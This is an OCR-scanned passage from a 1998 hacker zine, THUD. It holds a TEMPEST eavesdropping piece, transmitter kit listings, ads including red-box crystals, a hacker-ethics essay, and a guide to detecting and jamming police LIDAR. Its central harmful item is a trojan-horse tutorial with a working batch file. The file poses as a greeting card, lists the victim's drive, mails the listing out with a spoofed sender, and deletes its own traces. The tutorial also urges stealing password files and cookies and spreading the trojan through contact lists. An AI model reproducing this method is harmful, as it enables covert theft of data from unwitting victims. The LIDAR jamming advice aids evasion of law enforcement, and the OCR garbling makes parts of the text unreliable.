switch and they want US to pay for it...Using TEMPEST technology they need never enter or come near your home or
business .
Foreign Intelligence Services :
In the last days of the Bush Administration, the mission of the CIA was partially changed to spy on foreign businesses and
steal trade secrets in response to the ever growing surveillance of American industry by foreign competitors and foreign
intelligence services . The Japanese are the worst. Most of the Japanese students living and attending school in the USA are
economic trade spies. The French intelligence service regularly bugged ALL the first class seats on AIR FRANCE flights to
eavesdrop on traveling foreign businessmen. EVERY foreign service in the world is involved in corporate espionage to gain an
economic advantage for their own companies. Do you have a foreign competitor? Then the chances are good that a foreign
intelligence agency will spy on you . TEMPEST technology is becoming the medium of choice .
The Activist:
Dedicated, yet misguided activists may wish to further their own cause by releasing your private disclosures to the media.
Every company circulates confidential memos that would be embarrassing if released to the public. TEMPEST technology
makes corporate snooping simple.
The Dissident:
Dissidents want to damage more than your company's reputation . They may use TEMPEST technology as a means of
compromising your internal security, valuable products and equipment , and even executive travel plans in order to commit
crimes against your person, family or property!
Financial Operators
Unethical financiers can benefit greatly from prior knowledge of a company's financial dealings. TEMPEST attacks can be
mounted quickly and from a distance with virtually no chance of discovery .
Competitors :
Competitors may seek to gain information on product development, marketing strategies or critical vulnerab ilities. Imagine the
consequences of a concerted TEMPEST attack on Wall Street. How much are you going to offer for that stock next week? You
need to buy how many shares for control?
Unions:
Unscrupulous union negotiators may use TEMPEST technology to gain knowledge of a company's bargaining strategies and
vulnerabilit ies. Is your company having labor problems? Is your company involved in any type of litigation or lawsuit with a
union? Does your company have layoffs pending?
"ON FfllTHflllOUIlNlIl
HACI(ERS PHREAKING SKAMZ GL08AL CONTACTS PIRATE RADIO
HIGHS NET EROTICA ELEC7IONIK CHOONZ SEKURITY
PHUTURE LIFESTYLES
P.O. Box 1905, Boulder, CO 80306-1905 USA
10 Volume 1 Issue 2 • Fall 1998 THUD
Employees:
One of your company's employees might use TEMPEST technology on another to further his own career and to discredit his
adversary. It would be a simple matter for an adversary to plant a mole in your company who could position TEMPEST
monitoring equipment in the right direction even though they might not be allowed to enter a specific restricted area ...
The Information Warrior :
Brokers may profit from selling your company's secrets to the highest bidder , or maybe even to anyone who wants to know l
Does your company have stock that is traded publicly? Or will be soon? With TEMPEST technology there is nowhere to
run...nowhere to hide ...Keep in mind that anybody with money, power , influence, or sensit ive information is at serious risk .
FINDINGS AND RECOMMENDATIONS
Using simple off-the-shelf components with minor modifications we were able to monitor computer CRTs "at-will" in suburban
and urban environments. We did not recreate the wheel. The TEMPEST monitoring premise is simple and anyone with a basic
knowledge of electronics could construct such a device and use it with impunity.
Our DataScan device differs from earlier models because of the unique signal amplification and directional antenna array used
which we believe enhances the collect ion process greatly .
It appears from our research that most individuals and compan ies do not use TEMPEST certified equipment and most have
never even heard of TEMPEST.
I believe the media should be made aware of the problem in hope that publicity about potential TEMPEST attacks will force the
government to release the information necessary to allow private citizens and industry the means to properly secure their
proprietary data .
Copyright 1996, All Rights Reserved
Frank Jones CEO
Technical Assistance Group
2472 Broadway Suite 328
New York, New York 10025 USA
24 Hour Voice Mail: 917-277-1983
E-Ma il: spyking@thecodex.com
To look for more TEMPES T information on the web try these phrases on your favor ite search engine :
tempest monitoring, tempest shielding, van eck monitoring, van eck eavesdropping.
THUD Volume 1 Issue 2 - Fall 1998 11
'trojan Mor5~5 Tor 'P(J",,,,i~5!
Ray 'Pio~ Haq'le
One of the oldest known revenge tactics is the proverbial Trojan Horse. A program that will appear as a gift
to the user, yet once opened, will commit horrible acts or steal information . While the idea of the Trojan
Horse has been lost within the past few years, the opportunity to create them has grown. As time goes on,
software vendors are creating bigger. better. badder tools for your Trojan Horse workshop . Here I will
discuss a few tools that I have used, and some tricks that you can play with to make the tools work for you.
The first piece of software that I will talk about is WindMail. WindMail deserves an award for it's awesome
resemblance to SendMail. SendMail (for you non-geeks) was a program written long ago for UNIX that
operates in much the same manner. Both of these packages give you a command line mail program. Also,
WindMail operates on whatever SMTP server you tell it to. So look around. Find an SMTP server that is fast
and furious! Check those large corporations who are too damn busy to monitor their mail server log files.
What makes this command line proggy great is that you can call it from batch files.
Using WindMail in conjunct ion with a few other programs will allow you to mail results to yourself from you
victim . Because the mail is sent so quickly. all you will need is a distraction for the user while WindMail
sends off file attachments in the background. Is there something you would like off of that person's
machine? Password files? Cookies? A dir of his/her C: drive? A friend of mine has even used this gag to
grab the Ultima Online configuration files. which contain valuable password information. Another thing to
remember about WindMail is that it features a Queue feature. Perhaps the victim will download your trap.
but he is offline when he runs it. This will create a Queued message . The message will sit around until the
mail server can be found, and all messages will be "flushed" (this will need additional .bat file writing so read
your WindMail documentation).
It will take more than a command line mail program to fool your victim. You will need something to interest
him and distract him from his flashing hard drive light. My personal favorite trick is an animated greeting.
Animated greetings are quickly becoming more popular, and most morons will open them without thinking
twice. So download some nice cheesy Hallmark greetings that are irresistibly adorable. Buy now you are
realizing that you will have to write a .bat file to tie these together.
There are several ways to arrange these programs in a .bat file. I personally prefer to get my files first
before I let the victim see my dumb ass slide show. So in the .bat file I run the WindMail portion first. While
the mail is being sent. the program hangs, so throw in some "wait" prompts . Be creative. Say something like
"Looking for you display setting ....Done!". etc. Now once that is complete . give them what they want and run
the greeting. You may also consider renaming your WindMail program to something else that suits your
trick. Your victim will see the name of whatever is running in the top of the DOS window.
So how do you tie all these programs together? Simple! Use TurboSFX . This software package allows you
to take a zip file and convert it into an executable file (kind of like WinZip's feature). This executable can
install files any way you want them. It will separate certain files into certain directories, overwrite without
user permission (AUTOEXEC.BAT?). run splash screens (pull out the porn pies), and most importantly, it
will run a file FROM the zip file once the extraction has been completed . So Joe Schmoe will never know
what hit him. He will open his greeting, files will be extracted. and a .bat file will be run. All he will ever see
is some quickly displayed "echo" stuff from your .bat file, and your stupid animated greeting. If you are
super 31337 you will even have your .bat file delete those extra evil files as well as the .bat file itself once it
has done the deed.
What are the drawbacks? Well, you knew there were a few. The biggest drawback is that the software I
have talked about is all trial stuff. WindMail gives you a full-featured program for their trial. You won't be so
lucky with TurboSFX. Although the trial version has all of the standard features, it will display a box
whenever your "creation" is run stating that it was created using the trial version.
This is a sure way to tip off your victim and tell him that they are opening a trap. Remember that they are
supposed to think this is a greeting card. You could also use WinZip's Self-Extractor. This is available for a
free trial too. WinZip comes with an SE creator built into it. but it's VERY weak! Download the add-on and
you won't be disappointed.
This is only the beginning. I invite you to explore these tricks and experiment with Trojan Horse warfare .
Don't limit yourself to what I have mentioned. Try variations. Maybe in a PKZip proggy and zip up several
files you would like from your victim. Perhaps you think the sucker won't open your greeting card since he
already hates your guts. Use your WindMail program to send it to him from one of his buddies. Steal his
12 Volume 1 Issue 2 - Fall 19.98 THUD
address list and send all his pals the same Trojan Horse from him. If you don't know how to talk directly to
SMTP servers, WindMail has an interactive mode. If you use WinZip's Self-Extractor creator, why not
change the icon to something more innocent looking? Have fun with it. I hope if you created some mayhem
with these ideas, you will e-mail me and tell me what kind of crap you have pulled.
Special thankx to the following United Phreaks Syndicate Members: I\HellFire/\, ErasOr/\, Discount_Man,
and Cryosis for letting me test these methods on them. :)
Where can I get it?
TurboSFX is available for download at: http://www.pgcc.com/turbosfx
WindMail can be downloaded by going to: http://www.geocel.com/windmail
PKZip (great old DOS zip utility) is still free at: http://www.pkware.com
WinZip's Self-Extractor can be had at: http://www.winzip.com/downse.htm
Greeting cards are everywhere! Try: http://www.greeting-cards.com
Batch File Example
Here is an example of a .bat file. This assumes you have these files under a directory names c:\greeting.
Windmail.exe - The WindMail command line core.
Windmail.ini - The WindMail config file. Must exist in same directory to run properly.
EVIL.bat - This batch file I am listing.
Greeting.exe - The stupid greeting card of your choice.
Message.txt - A message body in .txt format.
REM Turn the echo off, so commands aren't shown to Mr. Victim.
@echooff
echo ===== Greeting Card Animation Viewer V1.02 =====
echo.
REM Throw in prompts to fool your victim.
echo Please wait while I quickly examine your system!
echo.
echo Looking at your video drivers...(this may take a moment)
REM Change to the root directory, and sump a directory ofthe C: drive into a file.
c:
cd\
dir c: Is >c:\greeting\hard.txt
echo Done!
REM More BS for the victim.
echo.
echo Preparing animation slides...
echo.
echo Found VXD.DLL Video driver!
echo.
echo Loading main animation file ...
REM Get into the c:\greeting directory, where all the evil programs are stored.
c:
cd c:\greeting
cis
echo Please wait while temporary files are removed ...
echo.
REM Some BS to convince your victim not to shut down your file transfer.
echo (Be patient! Closing this window will cause files to be left on your hard drive)
REM Windmail is run. It sends a file named hard.txt to your email address with a message
REM written in message.txt, and it will appear FROM:Victim@yahoo.com
windmail -a hard.txt -u Victim@yahoo.com -n message.txt youremailhere@yourdomain.com
REM Now the actual greeting card is run. •
c:\greeting\greeting.exe
REM Now, you remove all of those evil files since they won't be needed anymore.
REM The> nul will forward the deleted items into "nul" rather than the recycle bin!
del c:\greeting\hard.txt > nul
del c:\greeting\windmail.exe > nul
del c:\greeting\message.txt > nul
del c:\greeting\windmail.ini > nul
continued on bottom of next page....
THUD Volume 1 Issue 2 • Fall 1998 13
Low Power Transmitter Kit Sources
hrick@World.std.com (Rick Harrison)
reprinted by permission from Iron Feather Journal #14
Here is a brief list of compan ies selling low power transmitter kits. Please send me information about any companies not listed ,
so that I can include them in future versions of this list.
Note to newcomers : to assemble these kits, you must be able to solder components onto a circuit board, and it helps if you
know the difference between a resistor and a capacitor . If you haven't reached this stage of electronic know-how yet, consider
buying some of the educational kits available from C&S Sales, 1245 Rosewood , Deerfie ld IL 60015, telephone 800-292-7711 .
Their electronic components course (item #ECK10 , $14.95) might be especially helpful to newbies.
When assemb ling radio circuit kits, I prefer to use narrow-diameter silver-bearing solder (Radio Shack #64-013 ) and a 15 watt
soldering iron (64-2051). You may need a more powerful soldering tool for making antennas out of large-d iameter wire,
soldering really large connectors toa printed circuit board, etc., but the 15 W iron works fine for most kits and reduces the
chances of overheating transistors and other heat-sens itive components .
Ramsey Electronics
793 Canning Parkway
Victor, New York 14564
phone 716·924-4560
The FM-10A is an FM stereo transm itter kit ($34.95 plus shipping) with a few milliwatts of output power. It is based on the
BA1404 integrated circuit. Ramsey kits have well-written instruction manuals , and most of the circuit boards have lots of wide
open space which makes modificat ions easy. The company also has a good reputation for service . These factors make
Ramsey kits a good choice for beginners , in my opinion. Their AM transmitter kit (item #AM-1 , $29.95) and their TV transmitter
kit (item #TV-6, $27.95) might also be of interest; however, there is much room for improvement in the design of these two
circuits .
DC Electronics
p.o. Box 3203
Scottsdale, Arizona 85271
The Improved Stereocaster is another FM stereo transm itter based on the BA1404 chip with a few milliwatts of outpu t power
($29.95 plus $3.50 S&H). It has a smooth fine-tuning control which makes it easy to get on the exact frequency you want, and
a voltage regulator for the BA1404 which improves stability . Documentation is not quite as lucid as Ramsey's.
Panaxis Productions
p.o. Box 130
Paradise, California 95967-0130
Catalog $1
This company offers many interesting books and kits. The REB-1 kit is a 100 milliwatt transmitter for the upper end of the AM
band ($34.95 plus shipping) . The FMO kit ($75) is a high fidelity stereo FM transmitter kit with 2 to 20 milliwatts of output
power . The FME-500 , a half-watt mono FM transmitte r with excellent technical characteristics, can be combined with their
stereo generator to build a high-qual itylow power station (>$200 for the two kits). Other items of interest include transm itters
for the 1750 meter band; a 1-watt shortwave transmitter kit; and more powerful FM transmitters (available only for export to
countires other than the USA). Panaxis kits might no be suitable for absolute beginners; you should have a little experience in
circuit assembly before you tackle these.
Supercircuits
13552 Research BLVD
Austin, Texas 78750
This company sells a low-power TV transmitter for channels 3 through 6 which appears to be of high quality ($49.985 plus
$4.50 S&H). For licensed radio amateurs , they also sell some ham TV transmitter kits with 1 to 2 watts peak output power that
can be adapted for use on UHF channels 14 through 19, and a linear amp for boosting the output of these transm itters.
...continued from previous page
cis
REM Some es
echo Process finished!
echo.
echoe For more FREE animations, visit our website at www.greeting-cards.com!
echo.
echo (If this window did not close automatically, you may close it now)
REM Finally, delete this bat file . You don't want anybody to see this file!
del c:\greeting\EVIL.bat > nul
end.
14 Volume 1 Issue 2 • Fall 1998 THUD
Free Radio Berkely
1442 A Walnut St.
#406 Berkely, California 94709
Items listed in their advertisements include a 5 watt mono FM transmitter kit ($55 plus shipping), a 1/2 to 1 watt stereo FM
transmitter kit ($50), plus kits for output filters, dummy loads, RF amplifiers, and antenna. Some people who ordered kits from
FRS have reported that they've waited a long time before receiving thier kits. Other have said thay had no problems when
dealing with FRS. FRS is spear-heading a movement to challenge the FCC's regulations and is trying to foster a low power
broadcasting movement. Contact them for more information . (Internet: frbspd@crl.com)
Xandi Electronics
p.o. Box 25647
Tempe, Arizona 85285
phone 800·336·7389
or 602-894-0992
The XFS108 kit ($41.95) is an FM stereo transmitter, probably based on the SA1404. Their advertisements give no specifics.
Tentronix
3605 broken Arrow
Coeur d'Alene, Idaho 83814
phone 208-664·2312
Another SA1404 based FM stereo transmitter kit ($24).
"TI~"TI~ C.C)l' SO)II~ C.C)C)I) Sl'IJI)II ron YC)II!
ECS QUARTZ CRYSTALS
This is the very same
crystal used in
making a Red Box.
We've got both 6.500Mhz and 6.5536Mhz crystals.
We know you may want one or the other
depending on your particular project.
$4 each including shipping.
Our best selling ~o piece screwdmer bit set is now available lor ~4O including shipping to anywhere in the U.S. The set includes
9 security Tone bits from TT7 through 1140, 7 security Hex bits from S/64' through 1/4', 4 security Scrulox bits from S-o
through S-~, 8 standard pieces, covered ~astic case wI anice handle lor all 01 the bits. This is an extreme~ han6t toolset!
6.50Mhz Crystals EPROM Programming Unusal web site listing Tool bits(includingsecurity)
6.5536Mhz Crystals Auction Booklet T-shirts other interesting stuff....
TO FIND OUT MtIRf ABOUT AllY SJtECIFIC flR(JDUCT WE IMVE, ",EASE CIlECK OUT on ADS III TIlE
ClASSIFIED SECT1011 OFTHIS MA(MZIIIE.
TCE Information Systems
P.O. Box 5142
Los Alamitos, CA 90720
Testing testing testing .
testing one... two.... three .
CANANYONEREAD THIS?
SEND ART/CLE~ PHOTOGRAPHS & ARTWORK to:
The Hackers Underground Digest
P. O. Box 2521
Cypress~ CA 90630
THUD Volume 1 Issue 2 • Fall 1998 15
Provided by Telecode
Contrary to what appears on the surface to be illegal, knowledge of how something operates is by itself,
quite lawful. It is not illegal to have, sell, give away, communicate or otherwise transmit such knowledge,
unless specifically prohibited by law and/or with the express intent to use such knowledge in an unlawful
manner.
It is not unlawful to be a "hacker", contrary to what the press, Janet Reno, and Hollywood would have you
believe. Do some hackers break the law? I think so, yes. Aren't all hackers the same? No. There are both
'good and bad' hackers. The distinction between the two being lost by those proclaiming that "all hackers
are bad, and are breaking the law". Read the definition of a real hacker further down this page for a better
understanding of just what makes a hacker and why.
EXAMPLES
(1) Schools teach knowledge all the time. Some of the things taught can be used improperly. TV shows how
to "kill people" all the time. Knowledge by itself in not immoral or otherwise illegal. Mere possession of
knowledge, is not an indicator that the person possessing the knowledge will commit a crime using it.
Promoting or advocating the unlawful use of any knowledge is generally illegal, however.
(2) Consider the person who purchases a gun. The purchase is legal. The ownership is legal. The use
(firing), within the law, is legal. Now have this same legal person shoot the guy next door. This is illegal. The
gun isn't at fault. The seller of the gun is not held liable, the manufacturer of the gun is not involved, even
though he designed and manufactured the weapon. Only the person actually committing the crime is held
liable. And only for the action of killing another, and not for the ownership of a weapon.
And so it goes with information, books, chips, knowledge, etc. It is in the application of the knowledge that
determines whether or not the person(s) involved are committing a crime. We strongly advocate using all
the knowledge and hardware/software we sell or make available in a legal fashion to benefit or educate the
user(s) and not to the detriment of some cable operator, Sysop or other company or entity.
Is hacking legal? Yes, if done lawfully.
HOW LONG WILL IT TAKE ME TO BECOME A HACKER?
A minimum of 2-3 lifetimes, or maybe, slightly less. Some have done it in only one lifetime, but there is
much to learn. Hacking requires the application of one's "raw brain power" combined with knowledge gained
through exploring and experiencing. No hacker is ever complete, one just evolves . Hacking is therefore a
commitment to learning. If you dislike school, hacking can be a way to increase your knowledge and better
yourself. As Teddy once said:
"Hackers lead the way...Others follow. Be a Hacker."
Teddy addressing U.S. Congress, 1992,
or was it Pedro's Bar and Grill? ..
DEFINITION FROM THE NEW HACKERS DICTIONARY
hacker In.!
[originally , someone who makes furniture with an axe) 1. A person who enjoys exploring the details of programmable systems
and how to stretch their capabilities , as opposed to most users , who prefer to learn only the minimum necessary . 2. One who
programs enthusiastically (even obsess ively) or who enjoys programm ing rather than just theorizing about programming. 3. A
person capable of appreciating hack value. 4. A person who is good at programm ing quickly. 5. An expert at a particular
program , or one who frequently does work using it or on it; as in ' a Unix hacker' . (Definitions 1 through 5 are correlated, and
people who fit them congregate .) 6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example. 7.
One who enjoys the intellectual challenge of creatively overcoming or circumvent ing limitations. 8. [deprecated) A malicious
meddler who tries to discover sensitive information by poking around. Hence . password hacker', ' network hacker'. The correct
term for this sense is 'cracker'.
The term 'hacker' also tends to connote membersh ip in the global community defined by the net (see network , the and Internet
address) . It also implies that the person described is seen to subscribe to some version of the hacker ethic (see hacker ethic).
It is better to be described as a hacker by others than to describe oneself that way . Hackers consider themselves something
of an elite (a meritocracy based on ability), though one to which new members are gladly welcome. There is thus a certain ego
satisfact ion to be had in identifying yourself as a hacker (but if you claim to be one and are not, you'll quickly be labeled
bogus) . See also 'wannabee' . (THUD editors note: also see "lamer" or "larnah")
16 Volume 1 Issue 2 - Fall 1998 THUD
c ARCADE GAMES
Sales - Parts P;;;;.~_- Service - Custom
If you're looking for one of those hard to
find arcade games, this is the place to
call. We have one of the largest
selections of hard to find classic arcade
games and pinballs. If you're looking for
a part or you just want an arcade game for
your business site or for home use, give
us a call. Be sure to mention you saw the
ad here in Blacklisted! 411.
Eldorado Games, Ltd.
911 S. East Street, Anaheim , CA 92805
Voice (714)535-3300 Fax (714)535-3396
THUD Volume 1 Issue 2 - Fall 1998 17
C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$C
: ~[}=u@ DI.fiJ§ @1.fiJ©J @QJ] ~§ @'If :
i ~DI D)~U=8 i
a$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$a
Most of you are familiar with police RADAR, especially if you megahertz.) Obviously it's much easier to say 904nm than it is
have a lead foot, or like me, a lead wrist. We've all been flying to say 331.62882 Thz.
down the freeway or some other road and seen the police
officer on his motorbike pointing that oversized can of Since it is very difficult to measure the slight doplar shift of
Pringles at us. No, that funny feeling you get inside is not such high frequencies the 904nm LASER diode is pulsed at
because the microwaves are frying your innards!!! I'm sure 1KHz (1000 times per second) with each pulse lasting only
many of you also have RADAR detectors. Well guess what?! 5ns (nanoseconds, a billionth of a second.) Instead, the
The police have a new speed detection system called L1DAR. precise timing of these pulses are compared with how long
I suppose most of you have already heard of it so that's not the pulses take to return to the detector. If the target is moving
such big news. But I'm betting that most of you don't know toward or away from the detector, the pulses will arrive either
that L1DAR detectors exist, and even fewer know that there a little farther apart (moving away) or a little closer (moving
are L1DAR jammers, just like for RADAR. L1DAR has some towards) together. It is this 1 kilohertz signal that becomes
very distinct advantages over convential RADAR, both for the doplar shifted and is used to determine the speed of the
police and you, the one trying to get out of a speeding ticket. target.
In this article we will be covering the theory of how L1DAR
works, how to detect it, and more importantly, how to defeat Detectors
or jam the system. We will also discuss some of the legal
issues regarding use and misuse of L1DAR. It is possible to detect L1DAR with a small device in the same
,... - -----_~---_ manner as a RADAR detector. There is just one problem
though. The advantage for the police of using L1DAR is how
fast the speed gun is able to lock on the target and determine
it's speed. Since the speed gun only sends out the laser when
the officer pulls the trigger, you're L1DAR detector is liable
only to warn you that you are about to be pulled over. If you
happen to be somewhat in line with the officer and a car in
front of you that is being target, you may detect some stray
radiation and you will be forwarned of the L1DAR speed guns
presence. Obviously this is of little use to the driver so the
only way to defeat L1DARis to reduce the amount of radiation
returned from your car or to actively jam the L1DAR signal with
your own 904nm emitters.
The Stealth Approach
Stealth does not make your car invisible, just as the F-117
Stealth fighter is not totally invisible on RADAR. Stealth
simply means to reduce the range at which confirmed
detection takes place. Stealth as applied to L1DAR simply
reduces the range at which an officer using L1DAR is able to
get a lock on your vehicle and determine your speed. The
advantage of stealth to the driver is that he has a L1DAR
detector which then goes off before the L1DAR gun has a
chance to lock onto the car giving you, the driver, time to slow
down and avoid a ticket.
So how do you make yourself stealthy? In principle, L1DAR
relies on refecltions of the laser radiation in order to detect
your speed . So in principle , you reduce the amount of
How L1DARWorks reflections on your car. Crazy you say? What about all my
chrome and shiny headlights? Doesn't surprise me that you
L1DAR, like RADAR, sends out a beam of electromagnetic didn't guess license plates. I bet your license plate has a
radiation of a specific frequency and/or modulation. This retroflective coating just like that on most stop signs. In fact,
radiation is reflected off the target and any movement will the license plate is the single most reflective object on a car.
impart a doplar shift to the signal, much the way a train whistle To see just how reflective, take your flashlight out on a dark
changes in pitch as it goes by while you sit in traffic, trying to night and shine it towards a parked car. You'll see the the
get to work ten minutes ago. This shifted signal is compared brightest reflection is the license plate. Of course there are
to the original signal sent out by the speed detection device to other reflections but more on those later. To know why this
arrive at a speed of the target. fact is important a little more information on the L1DAR gun is
in order,
L1DAR uses infrared radiation unlike RADAR which uses
microwaves. Basically irs just a much much higher frequency. So far we know the frequency, 904nm, and the pulse
Generating these frequencies is easy. The device just uses a characteristics, 5ns pulses at 1Khz repitition rate. Now you
LASER diode similar to the ones used in CD and DVD need to know that size of the LASER beam itself. Most
players. At these high frequencies it is more common to LASERS are very narrow beams that do not spread very
specify the wavelength of the device rather than the much. Any of you with LASER pointers will know that. There
frequency. In the case of L1DAR the wavelength is 904nm is a difference with the LASER used in L1DAR. It spreads just
(nanometers, one billionth of a meter, one millionth of a a bit more, which is by design. The cone of radiation is
millimeter, damned small!!) which, based on a speed of light measured in radians instead of degrees. A radian is a
of 299,792,458 meters per second gives a frequency of hemisphere/pi ,thatis,180/3.141592653589,whichtumsout
331.62882 THz (tera hertz , 1000 gigahertz, one million to be 57.29578 degrees . That's a pretty large and
18 Volume 1 Issue 2 - Fall 1998 THUD
cumbersome unit to use, kinda like the Farad used to lights? At last check there were no manufacturers of the
measure capacitors in electronics. Instead, milliradians are 904nm shielding for these but that will probably change in the
commonly used, being 1 thousandth of a radian (.05729578 future. I wouldn't be surprised if they started making full
degrees). packages with peel-and-stick optically transparent stickers to
go over all your reflectors. In the mean time it would be
The L1DAR LASER is emitted in a cone of 4 milliradians. possible for you to just purchase an extra license plate shield
Doing some quick trigonometry it tums out that at 250 meters or two and cut out pieces to fit over your reflectors and tail
the L1DARbeam has expanded to a radius of just a hair over lights.
1 meter. That is another reason L1DAR is so effective for the
police officer. They can target a specific car quite easily due If you really wanted to go gung ho and eliminate even more
to the relativly narrow beam compared to conventional reflections, or are just plain paranoid like the rest of us you
RADAR. And on top of this, the police officers are trained to can also do something about your headlights. You could also
target your license plate specifically . Remember how put some of that license plate shielding over your headlights.
reflective it is? There are those smoke colored headlight covers that do a
fairly good job of eliminating 904nm reflections from
There are, obviously, other reflective parts on your car. After headlights, but these are actually illegal in most states. Of
your license plate would be all the reflectors. Your side course, check you local laws. Also, don't forget about your fog
reflectors and tail lights usually have these little hexagonal lights as they will reflect as well.
cubes in them like in a bicycle reflector. They serve the same
purpose and, if facing towards the officer with the L1DAR gun, As for chrome or really shiny paint jobs, there's not much you
will help reflect some of the LASER back to the detector. can do unless you are willing to effectively ruin the look of
These refelctors are usually only found on the side and your car. It's all up to you. If you want to spray flat black paint
integrated into the tail lights. This is still important because all over your chrome it's your choice.
L1DAR works just as good if you are driving away fromthe
officer as if you were driving towards him. Yes, he could zap
you with the L1DAR *AFTER* you have passed the officer
totally concealed behind that big tree. Most people don't think
about getting zapped from behind.
Also of importance to reflections are your headlights .
Headlights by design are optical focusers. They are made to
focus the the light from the small filament in the buld into a
narrow beam. Of course the glass cover then disperses some
of this light to the sides so you don't have complete tunnel
vision at night. The point is is that headlights can reflect some
of the L1DARradiation back towards the detector.
Of less importance is anything else that's particularly shiny on
your car. Things like chrome bumpers adn grill work will
reflect some radiation but this amount is almost negligible
when compared to the license plate.
Now, it should be noted that all the reflective surface just
discussed are visible reflections, which are typically defined
as the range of 700 to 300 nanometers. L1DAR uses 904nm
infrared radiation and just because something is reflective or
dull in visible does not mean it is so in infrared. But not to
worry, 904nm is close enough to the visible that any
differences in reflectivity can safely be ignored.
Making Your Car Stealthy
So now that you know what it is that reflects the L1DAR
radiation, how do you keep your car from reflecting the
LASER back to the detector? First off, it is impossible to
eliminate ALL the reflections but you can do a lot towards
reducing the amount of reflection enough to allow your L1DAR
detector enough time to wam you so you can slow down in
time.
Jamming
Since the most reflective part of you car is the license plate, a
simple plastic cover that absorbs 904nm radiation will go a All the previous methods of defeating L1DAR are passive in
long way towards stealthing your car. These shields are nature. They only hinder reflections from reaching the L1DAR
optically transparent, that is they look clear, yet they absorb detector. The other route is to actively jam the L1DARsignal to
the 904nm L1DAR radiation therby prevent the officer from confuse it. That way it NEVER gets a lock on your vehicle.
getting a L1DARlock on your license plate until you are very
close to them. By then your detector will have gone off and The principle behind jamming is to send out your own signal
you will have slowed to a legal speed. There are so that the detector is blinded and unable to see it's own
manufacturers of such shields. There's a few with websites reflection. It's just like what the military does with RADAR. A
listed at the end of this article. Also, if you can legally get good example is a concert. It's pretty hard to hear someone
away with it, removing your front license plate will reduce your talking if Metallica is cranking out 130 decibels.
vehicles frontward reflections quite a bit. Remember, the
license plate is the nunmber one source of reflections by a One way of jamming the signal is to simply have an array of
long shot and in most speed traps the officer is pointing ther LEOs or even LASER diodes that cover 904nm shining
L1DAR at the front of the car. But remeber to get one for your towards the L1DAR gun. There is one sticking point to this
rear license plate as well to be safe. Something else you idea though. The incoming signal from the L1DAR gun is a
could do to your plate is to paint over it in the same colors as pulsed 1KHz pulse train. In order to effectively drown out this
the original but in a matt finish. This COULD be illegal so signal a CW (continuous wave, like DC as oppposed to AC)
check local laws first. signal would have to be pretty bright in order to drown it out.
But how do you defeat the comer cube reflectors and tail It's like having a really loud hom blowing on a certain note.
THUD Volume 1 Issue 2 - Fall 1998 19
Even though the hom is loud you will still be able to hear a
quiter note that is pulsing. The horn would have to be really
r---------------------.
I?ud in order for you to not hear the quiter notes. Anyway, a
little more background on the power levels involved will help.
The LASER diode in a L1DAR unit pulses at 25 watts of
power. From earlier paragraphs you will recall that the beam
spreads by a certain amount, which at 250 meters ends up
being about 1 meter across. This beam spread reduces
energy density the farther it has to go. A 1 meter cirde has an
area of 3.14 square meters. License plates have an area of
.046 square meters (6x12 inches, 72 inches sq) which means
the license plate could only reflect at most 1.46 percent of the
L1DARenergy. Since the reflective coating only reflects about
ten percent let's cut this number down to .1 percent. This
means the license plate only reflects about 25 milliwatts.
Most license plates reflect light at a narrow range of angles,
pretty close to the 4 milliradians of the L1DARemitter. If this is
the case then the light reflected back to the L1DAR unit 250
meters away spreads to the same 1 meter diameter cone.
But, the L1DAR detecter lense is about 4 inches across or
about .1 meters, which gives an area of only .000785 meiers
square. That means the light received by the detector from
the license plate is only .785 percent of the reflected 25
milliwatts, or about 20 microwatts . Needless to say the
detector has to be very sensitive.
Now that we know how little energy the L1DAR detector is
detecting, we can use the reverse process to figure out how
powerful our emitters would have to be to drown out the
detector. Let's assume (I hate assuming but I have no hard'
data on how much energy is needed) that in order to drown
out the detector it needs to receive 100 times the energy it
normally detects. That'd be 20 microwatts x 100 or 2
milliwatts.
Now, if we're 250 meters away with a 904nm emitter how L1DAR works is that it detects a time shift in the reflected
much power do we need to transmit? The problem is that pulse train because the target vehide is moving. What if we
since we don't know where the L1DAR detector is, our sent out our own pulse train? This is in principle relatively
emitters beam diameter is going to need to be pretty wide. If easy. All that is needed is a simple computer connected to
we figure an average four lane highway to be 50 feet, or 15 your car in some way as to know how fast you are going. It
meters across, we can use 15 meters as how wide our beam could then determine what the doplar shift of a L1DAR beam
is at 250 meters. That means it has an area of 177 meters would be at that speed if it were to be targeted. The computer
square!!! Pretty big. From above we know the detector to C?uldthen mak~ it's own pulse train at the right 'doplar shift' to
have an area of only .000785 meters. That means it will Simulate a vehicle going at the speed limit, slower, or even
receive only .0044 percent of our jamming emitters output. some outragous speed. It could in effect send two signals to
Knowing that it takes 2 milliwatts to jam the detector, we the L1DAR unit, one saying the car is going 25 mph and
calculate that out emitter would have to be at least 45 watts. another saying it was going 250 mph!! These would be
received along with the REAL signal of 85mph. The L1DAR
Obviously it would take a heck of a lot of LEOs to get that kind
of power. And this is with an assumption that it only takes 100 detector won't know which signal is the real signal and won't
be able to tell the officer you're speeding.
times the normal received signal power to drown out the
detector. It could very well require even more to do so.
The beauty of this is that you won't need to drown out the
Seems it might be infeasible to jam the signal. Sure, if you detector, therfore needing to transmit tens of watts of power.
wanted to spend the hundreds of dollars I suppose you could You may onl~ need to transmit one watt, easily in the range of
actually purchase the same LASER diodes that are used in a few, posslbly only one IR LED. The downside is the
~ph isti~ti~n of ~he electronics to perform this task. Using
the L1DARunits and easily come up with enough power to do
the job. But the cost of that almost makes the ticket this active Jamming method in conjuction with the stealth
tec~nique~ outline a~ve will more than likely keep you from
worthwhile.
getting a ticket. That ISunless you were doing that 85 mph on
a residential stree!!!!
But wait, there's more. It still may work IF you use the above
stealth techniques IN ADDITION TO the jamming system. If
Legal Issues.
you eliminate the license plate as a reflector you've eliminated
75 percent of the signal retum to the L1DAR. That means you
only need 25 percent of the original power or about 12 watts. L1DARdetection is unregulated in nearly every state. Listed
That's stilll quite a bit of power but much more feasible. below is a list of those states that DO have some sort of
regulations or laws. It should be noted that federal law
Active Jamming prohibits detectors in commercial vehides in ALL states.
There is a slightly different approach to jamming. The above District of Columbia - Jammers and detectors both illegal.
technique works on the principle of blinding or drowning out Minnesota - Jammers illegal. Detectors ok, but they
the detector with so much energy that it cannot 'see' the supposedly have a law about hanging things from
reflected signal from itself. But what if the L1DAR detector windshields...better use dash mount.
received so many different signals at once? It'd be confused Oklahoma - Jammers illegal. Detectors ok.
